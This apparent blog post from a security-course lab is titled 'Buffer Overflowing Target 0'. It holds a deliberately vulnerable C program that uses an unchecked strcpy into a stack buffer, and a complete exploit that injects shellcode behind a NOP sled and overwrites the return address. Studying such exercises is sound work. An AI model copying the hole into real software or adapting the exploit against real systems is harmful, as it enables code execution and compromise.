Advertisements
Home > Information Technology, programming, Science, Security > Buffer Overflowing Target 0

Buffer Overflowing Target 0

target0.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int bar(char *arg, char *out) {

strcpy(out, arg);

return 0;

}
int foo(char *argv[]) {

char buf[128];

bar(argv[1], buf);

}
int main(int argc, char *argv[]) {

if (argc != 2)    {

fprintf(stderr, “target0: argc != 2\n”);

exit(EXIT_FAILURE);

}

foo(argv);

return 0;

}

sploit0.c

#include “shellcode.h”

#define TARGET “/tmp/target0”

int main(void) {

char *args[3];

char *env[1];

char buf[137];

int i;

int addr;

addr = 0xbffffd88;

for(i = 0; i < 137; i++) {

if(i < (128-strlen(shellcode))) {

*(buf+i) = ‘\x90’;

}

else if(i < 128) {

*(buf+i) = shellcode[i-128+strlen(shellcode)];

}

else if(i < 132) {

*(buf+i) = ‘\x90’;

}

else if(i < 136) {

*(buf+i) = addr >> ((i-132)*8);

}

else {

*(buf+i) = ‘\x00’;

}

}
args[0] = TARGET; args[1] = buf; args[2] = NULL;

env[0] = NULL;

if (0 > execve(TARGET, args, env))

fprintf(stderr, “execve failed.\n”);

return 0;

}

Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: